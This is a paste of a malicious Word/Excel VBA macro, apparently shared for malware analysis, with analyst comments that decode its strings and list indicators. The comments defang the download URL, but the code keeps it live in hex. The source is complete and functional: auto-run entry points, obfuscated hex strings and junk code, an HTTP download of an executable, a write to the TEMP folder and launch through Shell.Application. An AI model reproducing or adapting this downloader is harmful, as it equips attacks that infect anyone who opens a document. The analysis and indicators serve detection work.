
Malicious Word macro

dynamoo Dec 17th, 2014 44 Never
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Function UDTTLHNNLLR(ByVal JZWYUDMMKHA As String, ByVal WFSSTRSIBJM As String) As Boolean
      ' Analyst summary: download-and-launch stage of the macro.
      '   JZWYUDMMKHA - URL that is requested over HTTP.
      '   WFSSTRSIBJM - file path the response body is written to.
      ' The declared Boolean result is never assigned, so callers always get False.
      ' GYMRNGSWQQQ is declared but never used. No On Error handler and no check of
      ' the HTTP status are visible: whatever the server returns is written to disk.
      '
      ' Obfuscation used throughout this function:
      '   * Every literal wrapped in bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr()
      '     is hex-encoded text; the decoded value is noted above each live call.
      '   * Each "GoTo <label> / Dim / Open / Put / Close / <label>:" group is dead code.
      '     The GoTo jumps straight to the label, so the Open/Put/Close never run.
      '     Their hex file names appear to decode to random lowercase letters, and the
      '     file numbers (e.g. #24764) are outside VBA's valid 1-511 range.
      '
      ' Observable behaviour for detection: the Office process instantiates
      ' MSXML2.XMLHTTP, writes a file under %TEMP%, then opens it via Shell.Application.
  10.      Dim RYNLMLSHMMO As Object, GYMRNGSWQQQ As Long, UGNASOWUCJI As Long, XHXKIQBTCVN() As Byte
  11.  
  12. GoTo vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp
  13. Dim yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld As String
  14. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75727A6577626A7873657979637A636B6B786F6A6B75676867696B777167746A666176737577786C626B78706E7A766462706F6277626B") For Binary As #24764
  15. Put #24764, , yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld
  16. Close #24764
  17. vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp:
      ' Hex decodes to "MSXML2.XMLHTTP": the COM HTTP client used for the download.
  18.     Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450"))
  19. GoTo gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba
  20. Dim ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma As String
  21. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("76796664646F756F696C6168626B6A7A62797A77786374637A74626C677466737361756C7565697973627A6E64786F6363726267786979") For Binary As #95221
  22. Put #95221, , ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma
  23. Close #95221
  24. gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba:
      ' Hex decodes to "GET"; the third argument False makes the request synchronous.
  25.     RYNLMLSHMMO.Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("474554"), JZWYUDMMKHA, False
  26. GoTo uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt
  27. Dim pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg As String
  28. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75766163766E736175686766687666626A78726F696373646668726C676A676A636A6C666462797271776A6D6B726F61706761616E7378") For Binary As #9306
  29. Put #9306, , pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg
  30. Close #9306
  31. uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt:
      ' The Send argument decodes to seven non-ASCII bytes (E0 EF F0 EE C8 C4 CB),
      ' passed as the request body. NOTE(review): its purpose is not evident from
      ' the code; it may simply be filler.
  32.     RYNLMLSHMMO.Send bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("E0EFF0EEC8C4CB")
  33.  
  34.  
  35.  
  36. GoTo jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq
  37. Dim mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr As String
  38. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("747668736B61746162706D6A75786C7066706973656D65637877636E616669786D646C61777863647A6779707A76627A7575626A6D7361") For Binary As #61996
  39. Put #61996, , mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr
  40. Close #61996
  41. jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq:
      ' Raw response bytes are copied into the Byte array unmodified.
  42.     XHXKIQBTCVN = RYNLMLSHMMO.responseBody
  43.  
  44. GoTo ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw
  45. Dim sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx As String
  46. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6574666267646763696567636969686273756D6162626D6972736E69736D726C657076786868717470637766767271756F75657772767A") For Binary As #60350
  47. Put #60350, , sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx
  48. Close #60350
  49. ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw:
      ' The only real file write in the function: a free file number is obtained
      ' and the downloaded bytes are written to the caller-supplied path.
  50.     UGNASOWUCJI = FreeFile
  51.     Open WFSSTRSIBJM For Binary As #UGNASOWUCJI
  52.     Put #UGNASOWUCJI, , XHXKIQBTCVN
  53.     Close #UGNASOWUCJI
  54. GoTo bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz
  55. Dim nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi As String
  56. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("706C68726B637772676D6E6E75656C6F6E627A646E756E7369766D7777716565646D6376697466757A6A78656662637171616769766465") For Binary As #90758
  57. Put #90758, , nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi
  58. Close #90758
  59. bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz:
  60.    
  61. GoTo bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl
  62. Dim iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc As String
  63. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6E706A756575796E6E636D756C7071707475717A797462756E63796465746B78786C75636E727A646571667861766A73756C756E6A656D") For Binary As #69362
  64. Put #69362, , iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc
  65. Close #69362
  66. bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl:
      ' Hex decodes to "Shell.Application". bBBBijgboj has no Dim in this function,
      ' so it is an implicitly declared variable.
  67. Set bBBBijgboj = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("5368656C6C2E4170706C69636174696F6E"))
  68. GoTo zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts
  69. Dim zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh As String
  70. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6C62757473677764747069747770707176746276616B6A6864637267706E79636B78717A6D69776B797067666975716A71726F7A736165") For Binary As #82676
  71. Put #82676, , zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh
  72. Close #82676
  73. zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts:
      ' Hex decodes to "TEMP". The opened path is hard-coded here rather than taken
      ' from WFSSTRSIBJM; it matches the written file only because the caller passes
      ' the same %TEMP%\ADGYMSEKRJE.exe path.
  74. bBBBijgboj.Open Environ(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("54454D50")) & "\ADGYMSEKRJE.exe"
  75.  End Function
  76. Sub Auto_Open()
      ' Auto-run entry point (Auto_Open is the name Excel runs automatically on open).
      ' The only live statement is the call to QTQFFWAVZYZ after the label; the
      ' Dim/Open/Put/Close group is skipped by the GoTo and never executes.
  77. GoTo gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd
  78. Dim usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr As String
  79. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D666C73777475666F72706179686565636879666D6B6E6563707367787A65757A6B78627363626F636F677071716B6673656E636A6B67") For Binary As #70233
  80. Put #70233, , usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr
  81. Close #70233
  82. gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd:
  83. QTQFFWAVZYZ
  84. End Sub
  85. Sub AutoOpen()
      ' Auto-run entry point (AutoOpen is the name Word runs automatically when a
      ' document is opened with macros enabled). It only forwards to Auto_Open; the
      ' Dim/Open/Put/Close group is skipped by the GoTo and never executes.
  86. GoTo uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod
  87. Dim ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl As String
  88. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("7868736E61706A72717368786E66666E6372646C6A7A61696567616168776D75747564667763676D617475716777646F6272656C6C656C") For Binary As #99406
  89. Put #99406, , ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl
  90. Close #99406
  91. uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod:
  92.     Auto_Open
  93. End Sub
  94. Sub Workbook_Open()
      ' Third entry-point name (Workbook_Open is Excel's workbook-open event handler).
      ' It only forwards to Auto_Open; the Dim/Open/Put/Close group is skipped by the
      ' GoTo. Defining the Excel and Word auto-run names side by side suggests the
      ' same module text is meant to work in either host; presumably generated.
  95. GoTo xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz
  96. Dim tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb As String
  97. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("656C666B6564787670696C7864626A7375796E6C6674626A71736F647163657569756573716F6D72616E75656268777074776F6C657962") For Binary As #52822
  98. Put #52822, , tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb
  99. Close #52822
  100. xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz:
  101.     Auto_Open
  102. End Sub
  103.  
  ' NOTE(review): no Sub/Function header precedes these lines in the paste, yet they
  ' end with "End Sub". Presumably the header line was lost when the macro was
  ' extracted or pasted; confirm against the original document. The fragment holds
  ' only the usual junk group (GoTo over Dim/Open/Put/Close) and no live statement.
  104. GoTo ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru
  105. Dim mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi As String
  106. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D6371647A747467686B6D6D7A66727066696D646C686C7167676776707477797469696C6B7463697876726F6E6E636B6C666C70706B77") For Binary As #3723
  107. Put #3723, , mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi
  108. Close #3723
  109. ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru:
  110.      
  111. End Sub
  112. Sub QTQFFWAVZYZ()
      ' Holds the sample's configuration and calls the downloader UDTTLHNNLLR.
      '   Argument 1: hex string decoding to the download URL (defanged here):
      '               hxxp://openstacksg[.]com/js/bin.exe
      '   Argument 2: drop path %TEMP%\ADGYMSEKRJE.exe, left in plain text.
      ' Indicators: the URL above and the file name ADGYMSEKRJE.exe under %TEMP%.
  113.     UDTTLHNNLLR bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("687474703A2F2F6F70656E737461636B73672E636F6D2F6A732F62696E2E657865"), Environ("TEMP") & "\ADGYMSEKRJE.exe"
  114. End Sub
  115.  
  116.  
  117. Public Function bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr(ByVal GVHUjdsf4f As String) As String
      ' String de-obfuscator: turns a hex string into text, two hex digits per character.
      '   GVHUjdsf4f - hex-encoded input, e.g. "474554" yields "GET".
      '   Returns    - the decoded string, built up in the function-name variable.
      ' The only statement that does work is the Chr$(Val("&H" & Mid$(...))) line
      ' near the end of the loop. Every If above it compares constants and is always
      ' False (n = n + 1, 6292 < 27, Len of a 12-character literal = Len of an
      ' 8-character literal), so no MsgBox or End is ever reached. This is padding
      ' that varies the code's appearance.
      ' For an odd-length input, the last Mid$ yields one character, which is decoded
      ' as a single hex digit.
  118.   Dim i       As Long
  119.   For i = 1 To Len(GVHUjdsf4f) Step 2
  120. If 871851 = 871851 + 1 Then End
  121. If 6292 < 27 Then
  122. If 549589 = 549589 + 1 Then End
  123. If 2244 < 25 Then
  124.         MsgBox ("ZRhNNOHl97")
  125. End If
  126. If Len("ZOhjMOnl6417") = Len("xeFXDFFY") Then
  127.        MsgBox ("Error !!!")
  128. End If
  129.         MsgBox ("fSlPSZnM79")
  130.  
  131. End If
  132. If Len("CSHpvLRP9465") = Len("vhlxUkrj") Then
  133. If 272625 = 272625 + 1 Then End
  134. If 2624 < 82 Then
  135.         MsgBox ("TQxnjYFY33")
  136. End If
  137. If Len("ZuzjUIji3464") = Len("rPTEHuGF") Then
  138.        MsgBox ("Error !!!")
  139. End If
  140.        MsgBox ("Error !!!")
  141.  
  142. End If
  143. If 958631 = 958631 + 1 Then End
  144. If 7345 < 91 Then
  145.         MsgBox ("aPgyRpZl73")
  146. End If
  147. If Len("aHfxvpdl1518") = Len("pRWkXaVk") Then
  148.        MsgBox ("Error !!!")
  149. End If
      ' Live statement: take the two characters at position i, parse them as hex,
      ' and append the resulting character to the return value.
  150.   bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr = bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr & Chr$(Val("&H" & Mid$(GVHUjdsf4f, i, 2)))
  151.  
  152.  
  153.   Next i
  154.  End Function